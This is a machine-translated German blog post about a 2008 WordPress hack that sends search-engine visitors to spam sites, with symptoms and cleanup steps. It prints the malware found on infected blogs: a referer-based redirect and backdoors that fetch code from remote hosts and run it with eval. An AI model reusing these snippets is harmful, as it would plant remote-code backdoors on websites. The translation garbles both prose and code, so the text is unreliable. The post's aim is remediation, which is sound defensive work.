WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr, die zu Your-Needs.info, zu AnyResults.Net, zu Golden-Info.net und zu anderen ungültigen Aufstellungsorten umadressiert werden

Häcker gehen alle heraus, zum zu zerhacken und WordPress Bloge auszunutzen bewirtete alle über dem Netz und pflanzte und böswilligen Code in WordPress Codes und Datenbank einspritzend, um Besucher und Schläge von Google und von anderem, zahlen-pro-klicken Suchmaschinen spam umzuadressieren Aufstellungsorte wie your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us und viele anderen Spamaufstellungsorte, denen füllte mit, CPC-Anzeigen. Irgendeine Kerbe scheint, größere Masse zu zielen, indem sie alle ohne WordPress Plätzchen umadressiert. Ohne zerhackt handeln diese angenommen, um im Blog als Bestimmungsort anzukommen.

Symptome der Engine-Umlenkungs-Kerbe

Merken Sie, dass nicht alle Symptome zusammen geschehen können. Es kann mehr, als geben eine Methode der Kerben existierte, die zum unterschiedlichen Finden und zur möglichen Entschließung beitrugen.

• Jedes mögliches Klicken durch von den Suchmaschinen wie Google, Yahoo, AOL, MSN, Windows-Phasensuchresultate, einschließlich Blognamen, wird zu den Aufstellungsorten des Hackers wie your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, mit der Liste umadressiert und nachgeschickt, die sicher ist zu wachsen. Projektor kommt in der Hackerseite mit der gleichen Suchschnur an, die er oder sie pflegten, um in der Search Engine zu suchen.
• Klicken Sie an eine Verbindung zum Blog auf RSS Zufuhrleser wie Google-Leser kann zum Hackeraufstellungsort auch umadressiert werden.
• Ein Besucher ohne Konto auf dem Blog oder nicht LOGON (tut folglich nicht lässt Plätzchen durch böswilligen Code ermitteln), werden spam Aufstellungsorte umadressiert.
• Nur Besuche von der Search Engine werden weg umadressiert, und der Trick erreichen, viele Bloggers, Webmasters und Aufstellungsortinhaber herum vermutlich zu täuschen oder verzögern mindestens die Abfragung des Probleme.
• Plötzlicher sehr großer und drastischer Tropfen und verlieren von der enormen Menge Besuchern handeln und paginieren Ansichten in Netzverfolgerstatistiken, besonders Verkehr mit Google als referrer, obwohl das Engineresultatsordnen intakt ist.
• Massic Tropfen der Werbeeinnahmen von Google AdSense oder anderes Anzeigennetz oder Teilnehmerkommissionen.
• Der folgende base64 verschlüsselte PHP-Code kann auf der wp-blog-header.php Akte erscheinen:

  <? PHP \
$seref=array („Google“, „msn“, „Phasen“, „AltaVista“, „bitten“, „Yahoo“, „AOL“, „CNN“, „Wetter“, „alexa“);
$ser=0; foreach ($seref als $ref) wenn (strpos (strtolower ($_SERVER ['HTTP_REFERER']), $ref)! ==false) {$ser=“ 1? ; Bruch; }
wenn ($ser==“ 1? && sizeof ($_COOKIE) ==0) {Überschrift (“ Position: http://“ .base64_decode (“ YW55cmVzdWx0cy5uZXQ="). “/"); Ausgang; }? >

• Ein Bild, das tatsächlich ein Bündel des böswilligen PHP-Codes ist, wurde dem Wpinhalt/dem Antriebskraftverzeichnis hinzugefügt. Z.B. können Wpinhalt/uploads/2008/06/06/abcdefghijklmn.jpg oder es innerhalb Ihres Themafaltblatts, d.h. Wpinhalt/Themen/Klassiker/Bilder/xyz.jpg sein. Der Name des Bildes kann im Format von xxxxxx_old.jpeg sein.
• Eine Eintragung wurde in der MySQL Datenbank eingesetzt, damit WordPress wp_options das Bild (den böswilligen PHP-Code) als Einsteck, gewöhnlich als rss_f541b3abd05e7962fcab37737f40fad8 aktivieren.
• Es kann böswillige Codes, besonders die auch geben, die mit eval () oder base64_decode () Befehl eingesetzt in andere WordPress PHP-Akten deuteten. Beispiele sind die folgenden Codes:

  wenn (isset ($_GET [„p“])) {
$sock = @fsockopen ('km20725.keymachine.de', 80);
wenn ($sock) {
fwrite ($sock, `ERHALTEN http://km20725.keymachine.de/server/index.php?host= '. $_SERVER [„SERVER_NAME“]. '&p='.$_GET [„p“]. '′ HTTP/1.0. “ \ r \ n ");
fwrite ($sock, `Wirt: km20725.keymachine.de'.“ \ r \ n \ r \ n ");
während ($content [] = fgets ($sock));
$content = implodieren (“, $content);
@eval (Ordnung (substr ($content, strpos ($content, „\ r \ n \ r \ n "))));
fclose ($sock);}
}

  wenn (isset ($_GET [„p“])) {@eval (@file_get_contents ('http://beliy.us/server/index.php?host= '. $_SERVER [„SERVER_NAME“]. '&p='.$_GET [„p“]));
}

  wenn (isset ($_GET [„p“])) {@eval (@file_get_contents ('http://seogoogle.us/server/index.php?host= '. $_SERVER [„SERVER_NAME“]. '&p='.$_GET [„p“]));
}

  eval (gzinflate (base64_decode (

• WordPress Thema, das aktiviert und verwendet ist, kann mit dem Zerhacken des Codes eingespritzt werden und auch beeinflußt werden. Solcher Code existiert normalerweise in header.php oder in index.php des Themas und hat eine Linie, die dem untengenannten ähnlich ist

  wenn ($ser==“ 1 ″ && sizeof ($_COOKIE) ==0) {Überschrift (“ Position:

Der WordPress Suchverkehr adressiert spam Aufstellungsortkerbe geschieht vermutlich wegen der Sicherheitslücke und der Verwundbarkeit um, die nicht ausgebessert wird, wenn Bloginhaber, sich entscheidet nicht zur spätesten Version von WordPress zu verbessern (obgleich einige Reports dass ihre Bloge zerhackt, obwohl sie bereits auf der spätesten Version von WordPress 2.5.1 ist). Was auch immer die Ursache, hier die Verlegenheit und die Lösung ist, zum der Kerbe zu lösen und zu besiegen, um zu garantieren, dass Sie zurück den Verkehr besitzen und vermeiden Sie bestraft von Google durch das unvernünftige Umadressieren spam Seiten.

1. Unterstützung die WordPress Datenbank.
2. Verwenden Sie phpMyAdmin, um WordPress MySQL zu grasen Datenbanktabellen. Zum wp_options Tabelle und redigieren dann die Reihe, die gehen active_plugins genannt wird. Die Reihe führt alle aktiven Steckverbindungen einzeln auf, die aktiviert worden ist. Die Liste (in einer Linie), durch und suchen nach ein Einsteck genannt beendet mit einer Bildverlängerung, wie .jpg, .jpeg, .gif und etc. zum Beispiel, laufen abcdefgh_old.jpeg. Merken Sie hinunter den Weg zur Bildakte.
3. Unter Verwendung des sFTP oder SSH (vergessen Sie über ftp oder telnet für Sicherheit), dann steuern Sie zum Weg der Akte, und löschen Sie die Akte.
4. Gehen Sie zur WordPress Verwalter-Steckverbindungverkleidung, entaktivieren Sie oder aktivieren Sie irgendwie Einsteck, um weg vom böswilligen Einsteck von der „active_plugins“ Reihe zu löschen.
5. Zurück zu phpMyAdmin am wp_options Tisch, finden Sie eine Reihe, die die folgende Schnur als option_name enthält:

   rss_f541b3abd05e7962fcab37737f40fad8

   Löschen Sie die wegreihe.

   Wenn Sie nicht durchführen können, ist die Datenbankreinigung, die in den Schritten oben einzeln aufgeführt wird, hier ein videotutorium:

6. Gehen Sie zum wp_users Tabelle. Wenn es einen namenlosen Benutzer (ungültiger Wert im user_nicename Feld) hergestellt am 00:00 gibt: 00 auf 0000-00-00, Anmerkung hinunter die Benutzernummer (Identifikation-Feld, eine Zahl). Löschen Sie den Benutzer.
7. Grasen Sie die wp_usermeta Tabelle. Lokalisieren Sie alle Reihen mit user_id Gleichen die Identifikation des gelöschten ungültigen Benutzers. Es gibt normalerweise drei Reihen verbunden zur Eindringlingbenutzernummer. Löschen Sie alle verbundenen Reihen.
8. Melden Sie zum Bediener an, um die Themaakten zu redigieren, oder grasen Sie den Code der Themaakten im Thema-Herausgeber der WordPress Verwalter-Entwurfsverkleidung. Überprüfen Sie das header.php und das index.php auf jedem misstrauischen Code. Wie oben erwähnt, suchen Sie nach etwas, das der Linie unten ähnlich ist:

   wenn ($ser==“ 1 ″ && sizeof ($_COOKIE) ==0) {Überschrift (“ Position:

   Wenn Sie gefunden werden, löschen Sie und entfernen Sie den Code. Merken Sie, dass der böswillige Code einige Linien lang in der Gesamtmenge ist.

9. Wenn er nicht bereits existiert wird, stellen Sie eine leere index.html-Akte im Wpinhalt/im Steckverbindungverzeichnis her. Unbelegte index.html versteckt den Inhalt des Steckverbindungverzeichnisses, abschirmen effektiv, welche Steckverbindungen verwendet von den Häckern, um die WordPress Sicherheit zu verhärten und festzuziehen.
10. Laden Sie und ersetzen Sie jedes WordPress Akten (nicht nur wp-blog-header.php) auf dem Bediener durch die neue, saubere und der Vorlage späteste Version von WordPress (selbstverständlich, ausgenommen wenige Akten wie wp-config.php und Themen). Wenn Sie verbessern, lesen Sie den Führer sorgfältig.
11. Ändern Sie Ihr Kennwort.
12. Wenn Sie mehrere Benutzer haben, ändern Sie ihr Kennwort (oder bitten Sie um um sie, um das Kennwort zu ändern), auch.

WICHTIG: Die Seite ist und vorausgesetzt „maschinell übersetzt, wie“ ohne Garantie ist. Maschinelle Übersetzung kann schwierig sein zu verstehen. Beziehen Sie bitte sich auf ursprünglichen englischen Artikel, wann immer möglich.

In Verbindung stehende Artikel

• Integrieren Sie und zeigen Sie Google AdSense für Suche an und Korb-paginieren kundenspezifische Engine-Resultate im WordPress Blog Schablone
• Ersetzen Sie Google-Blog-Suche durch Technorati für ankommende Verbindungen im Armaturenbrett von WordPress
• StatTraq - Wordpress Einsteck für Aufstellungsort-Statistik und Verkehrs-Kostenzähler
• Dieser Aufstellungsort mag Ihren Computer auf jedem schädigen Aufstellungsorte abhören in den Google-Suchresultaten
• Kerbe zum frei Suchen und PhasenWebcam mit Google-Suche anzusehen
• Wikiasari - Google-Korb kundenspezifische Search Engine, Digg oder StumbleUpon für Wikipedia?
• WordPress Einsteck: Anzeige Google Analytics und FeedBurner Report-Statistiken vom Aufstellungsort Admin
• Voller Satz des Google-Engine-Feiertags-Firmenzeichens Collection (1998 - 2007)
• Wie man WordPress Kennwort zurückstellt, um vergessenes Geheimnis zurückzugewinnen

Diese Eintragung wurde am Dienstag, dem 10. Juni 2008 am 1:03 morgens bekannt gegeben und wird unter Weblogs archiviert. Sie können allen möglichen Antworten zu dieser Eintragung durch die RSS 2.0 Zufuhr folgen. Sie können eine Antwort oder trackback von Ihrem eigenen Aufstellungsort lassen.